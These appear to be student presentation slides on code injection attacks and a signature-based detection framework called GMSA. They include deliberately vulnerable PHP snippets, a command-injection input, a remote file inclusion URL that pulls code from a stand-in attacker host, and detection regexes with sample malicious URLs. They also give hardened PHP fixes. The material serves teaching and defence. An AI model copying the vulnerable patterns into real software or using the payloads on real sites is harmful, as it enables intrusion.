Coordinator Name: Muneeba Zuha
Internal Guide: Swapna G
K Vidya sree, 16321A05B5, IV CSE B
Code Injection Attacks
• Code Injection is the general term for attack types which consist of injecting code
that is then executed by the application.
• This type of attack exploits poor handling of untrusted data. These types of attacks
are usually made possible by a lack of proper input/output data validation.
• An authorized user can obtain access to the system’s database by inserting his or her
username and password into the system; then the system checks if the username and
password are correct or not.
• An attacker gets access to the information in the webpage's database by using
methods of attack such as code injection attacks (CIA).
Types of Code Injection
• XSS Attacks
• SQL Injection Attacks
• Shell Injection Attacks (Command Injection Attacks)
• File Inclusion Attacks
XSS Attacks
• Cross Site Scripting attack means sending and injecting malicious code or script. Malicious
code is usually written with client-side programming languages such as JavaScript, HTML,
VBScript, Flash, etc. However, JavaScript and HTML are mostly used to perform this attack.
• The main cause of this attack is inadequate validation of user input, which lets malicious
input reach the output. A malicious user can enter a script, which is then injected into
the website's code. The browser cannot tell whether the code it executes is malicious or
not.
Examples:
SQL Injection Attacks
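Shell Injection Attacks (Command Injection Attacks)
<?php
// Deliberately vulnerable: the user-supplied file name is passed to the shell unchanged.
print("please specify the name of the file");
$file = $_GET['filename'];
system("cat $file");
?>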
If the user gives the input 'profile.txt', the corresponding file is displayed.
But suppose an attacker gives the input 'profile.txt ; ls;'. The shell then also runs ls and lists all the files in the
directory.
File Inclusion Attacks
Remote file inclusion (RFI) allows an attacker to include and execute a remotely hosted file by getting a script on the attacked
page to include it. The attacker can use RFI to run malicious code either on the client side or on the server.
One of the vulnerable locations can be as follows, where the value of the “testfile” parameter is supplied by
the user:
www.victim_site.com/abc.php?testfile=example
The vulnerable PHP code is as follows:
// Deliberately vulnerable: the request value is used directly as the include target.
$test = $_REQUEST["testfile"];
include($test . ".php");
The following is one possible attack vector for the vulnerable PHP code above:
www.victim_site.com/abc.php?testfile=http://www.attacker_site.com/attack_page
The file “attack_page” is now included into the vulnerable page on the server, and it is
executed whenever the “abc.php” page is accessed or executed. The attacker can place malicious code in this
“attack_page” and use it to perform malicious activities.
Local file inclusion:
Local file inclusion is the inclusion of local files that are available on the server. This
vulnerability occurs when user input contains the path to the file that has to be included. When such input is
not properly sanitized, the attacker may supply some default file names and access unauthorized files, or
may use directory traversal characters to retrieve sensitive files from other directories.
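Hardened counterparts of the two vulnerable PHP snippets above, given here as an added example that is not part of the original slides. The function names read_user_file and resolve_include, the demo directory and the pages/example.php path are hypothetical.

```php
<?php
// Added example (not from the original slides): hardened counterparts of the
// two vulnerable snippets. Function names and the demo directory are hypothetical.

// Replaces system("cat $file"): no shell is started, and the resolved path
// must be a regular file directly inside $baseDir.
function read_user_file(string $baseDir, string $name): ?string {
    // Accept plain file names only; this rejects spaces, ';' and '/'.
    if (!preg_match('/\A[A-Za-z0-9._-]+\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    // realpath() resolves ".." and symlinks and returns false if nothing exists.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)
        || dirname($path) !== $base) {
        return null;
    }
    return file_get_contents($path);
}

// Replaces include($test . ".php"): the request value is only a lookup key
// into a fixed allowlist, so it never becomes part of a path or URL.
function resolve_include(array $allowed, string $key): ?string {
    return $allowed[$key] ?? null;
}

// Constructed demo data; in a web request the inputs would come from $_GET.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inj_demo_' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'profile.txt', "name: demo\n");
$pages = ['example' => __DIR__ . '/pages/example.php'];

$names = ['profile.txt', 'profile.txt ; ls;', '../profile.txt'];
foreach ($names as $name) {
    var_dump($name, read_user_file($dir, $name));
}
$keys = ['example', 'http://www.attacker_site.com/attack_page'];
foreach ($keys as $key) {
    var_dump($key, resolve_include($pages, $key));
}
```

Keeping PHP's allow_url_include setting at its default of 0 adds a second layer against remote inclusion, independent of the allowlist.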
• The GMSA framework works by detecting signatures that an attacker could
use when attempting a code injection attack.
• Most research has focused on the two major types of CIA, namely SQL injection and
XSS attacks.
• GMSA considers all possible CIAs and their mitigating strategies. Our empirical
analysis demonstrates that GMSA is effective in detecting CIA, with a low false
positive rate of around 0.59%.
PROPOSED GMSA MODEL
In this section we present the GMSA model for detecting and classifying CIAs.
There are five phases:
Phase 1 - URL Collection
Phase 2 - Proposed Method
Phase 3 - Dataset Testing
Phase 4 - Proposed Classifier
Phase 5 - Classifier Result
Phase 1: URL COLLECTION
Initially, the dataset for the URL Collection, consisting of both benign and malicious URLs
was collected from two different resources. Dataset A was downloaded from HTTP
DATASET CSIC 2010 which consists of large amounts of code injection attack datasets,
while Dataset B was downloaded from SecLists which is a security tester’s companion.
Phase 4: CLASSIFIER
• In the Proposed Classifier, our proposed framework receives the link’s code from the
dataset, and checks whether it is benign or malicious.
• We check, classify, and validate the training and testing datasets with the GMSA
framework to generate and construct the Classifier Result.
Phase 5: CLASSIFIER RESULT
The last phase is known as the Classifier Result. In this phase the GMSA framework informs
us whether each link’s code in the datasets is benign or malicious.
We collect the results of the Proposed Classifier and determine the output result which
consists of
Precision Rate (PR),
Recall Rate (RR),
False Positive (FP),
False Negative (FN),
True Positive (TP),
True Negative (TN),
Accuracy (ACC)
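The classification and scoring steps of Phases 4 and 5, sketched as an added example that is not the GMSA implementation and not code from the original slides. The signature list, the function names and the hand-labelled URLs (including view.php, search.php and hello.php) are constructed for illustration and cover only the shell, file inclusion and XSS cases illustrated above.

```php
<?php
// Added example, not the GMSA implementation; signatures and URLs are constructed.
const SIGNATURES = [
    'shell' => '/[;|&`]/',                  // command separators in a value
    'rfi'   => '#\A\s*(?:https?|ftp)://#i', // value is a remote URL
    'lfi'   => '#\.\.[/\\\\]#',             // directory traversal sequence
    'xss'   => '/<\s*script\b/i',           // script tag in a value
];

// Returns the name of the first matching signature, or null if none match.
function classify_url(string $url): ?string {
    // parse_str() splits the query on '&' and URL-decodes each value.
    parse_str(ltrim((string) strstr($url, '?'), '?'), $params);
    $hit = null;
    array_walk_recursive($params, function ($value) use (&$hit) {
        foreach (SIGNATURES as $name => $regex) {
            if ($hit === null && preg_match($regex, (string) $value)) {
                $hit = $name;
            }
        }
    });
    return $hit;
}

// Confusion-matrix counts plus the rates listed under Phase 5.
function evaluate(array $labelled): array {
    $c = ['TP' => 0, 'FP' => 0, 'TN' => 0, 'FN' => 0];
    foreach ($labelled as [$url, $isMalicious]) {
        $flagged = classify_url($url) !== null;
        $c[($flagged === $isMalicious ? 'T' : 'F') . ($flagged ? 'P' : 'N')]++;
    }
    $div = fn($a, $b) => $b > 0 ? $a / $b : 0.0;
    return $c + [
        'PR'  => $div($c['TP'], $c['TP'] + $c['FP']),
        'RR'  => $div($c['TP'], $c['TP'] + $c['FN']),
        'FPR' => $div($c['FP'], $c['FP'] + $c['TN']),
        'ACC' => $div($c['TP'] + $c['TN'], array_sum($c)),
    ];
}

$samples = [ // [url, is_malicious]; constructed and hand-labelled
    ['www.victim_site.com/abc.php?testfile=example', false],
    ['www.victim_site.com/search.php?q=tea%3B+coffee', false],
    ['www.victim_site.com/view.php?filename=profile.txt%20%3B%20ls%3B', true],
    ['www.victim_site.com/abc.php?testfile=http://www.attacker_site.com/attack_page', true],
    ['www.victim_site.com/abc.php?testfile=../../secret', true],
    ['www.victim_site.com/hello.php?name=%3Cscript%3Ealert(1)%3C/script%3E', true],
];
print_r(evaluate($samples));
```

The benign search URL contains an encoded ';' and is flagged by the shell signature, which shows how a purely signature-based check produces the false positives that the FP count and false positive rate measure.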
ROC DIAGRAM OF DATASET A